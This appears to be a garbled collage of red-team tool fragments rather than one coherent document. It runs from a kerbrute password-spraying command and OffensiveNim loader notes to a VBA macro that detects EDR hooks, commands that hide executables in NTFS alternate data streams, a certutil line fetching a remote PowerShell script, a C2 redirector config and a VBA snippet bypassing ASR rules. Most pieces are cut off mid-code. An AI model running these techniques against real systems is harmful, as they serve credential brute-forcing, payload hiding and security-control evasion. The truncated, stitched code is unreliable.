With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
import nimcrypto
import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy
#[
All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t
nimble install winim nimcrypto zippy
nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim
slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time.
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)
'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print "usage: %s file.bin\n" % (sys.argv[0],)
        sys.exit(0)
    shellcode = "\""
    ctr = 1
    maxlen = 15
###Add content to ADS###
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
#!/usr/bin/python
# -*- coding: utf8 -*-
#
# Author: Arno0x0x, Twitter: @Arno0x0x
#
import argparse
from Crypto.Cipher import AES
import pyscrypt
from base64 import b64encode
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
Define REDIR_TARGET |DESTINATIONURL|
RewriteEngine On
RewriteOptions Inherit
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub